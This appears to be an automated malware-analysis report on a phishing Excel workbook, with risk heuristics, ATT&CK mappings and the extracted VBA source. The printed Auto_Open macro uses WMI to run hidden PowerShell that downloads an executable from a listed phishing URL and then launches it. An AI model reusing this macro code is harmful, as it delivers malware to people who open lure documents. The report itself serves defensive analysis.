MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1203 Exploitation for Client Execution
The sample contains VBA macros with an Auto_Open subroutine, which is a common technique for executing malicious code upon opening the document. The macro references PowerShell and uses WMI to launch a process, indicating it attempts to download and execute a second-stage payload from the embedded URL http://10.16.28.211:8080/phishing/PerformanceCheck.exe. The document body content appears to be a lure for gift cards or food items, suggesting a phishing or scam attempt.
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errDownload = objProcess.Create("PoWershElL -command ""Invoke-WebRequest http://10.16.28.211:8080/phishing/PerformanceCheck.exe -o c:\Users\Public\Downloads\test.exe""", Null, objConfig, intProcessID) Set FSO = CreateObject("Scripting.FileSystemObject") -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Const HIDDEN_WINDOW = 0 Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
errDownload = objProcess.Create("PoWershElL -command ""Invoke-WebRequest http://10.16.28.211:8080/phishing/PerformanceCheck.exe -o c:\Users\Public\Downloads\test.exe""", Null, objConfig, intProcessID) Set FSO = CreateObject("Scripting.FileSystemObject") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Const HIDDEN_WINDOW = 0 Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://10.16.28.211:8080/phishing/PerformanceCheck.exe In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2584 bytes |
SHA-256: db3e2303d83b277979ec775ce369b2a2e3af168da814b6d4d661e7a1204fc685 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
For Each pic In ActiveSheet.Pictures
pic.Delete
Next pic
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "模块1"
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) '64'
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) '32'
#End If
Sub auto_open()
Dim psCmd As String
Dim FSO
Dim flen As Long
Const HIDDEN_WINDOW = 0
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errDownload = objProcess.Create("PoWershElL -command ""Invoke-WebRequest http://10.16.28.211:8080/phishing/PerformanceCheck.exe -o c:\Users\Public\Downloads\test.exe""", Null, objConfig, intProcessID)
Set FSO = CreateObject("Scripting.FileSystemObject")
Do
Sleep 5
Loop While FSO.FileExists("c:\Users\Public\Downloads\test.exe") = False
Do
Sleep 50
flen = FileLen("c:\Users\Public\Downloads\test.exe")
Loop While flen <> 24576
errCreate = objProcess.Create("c:\Users\Public\Downloads\test.exe", Null, objConfig, intProcessID)
End Sub
Attribute VB_Name = "CreateNewMacros"
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 25088 bytes |
SHA-256: aca13baffde20c08f0117b92c5d00a153e153439e8394b817634cb13200cdc3b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.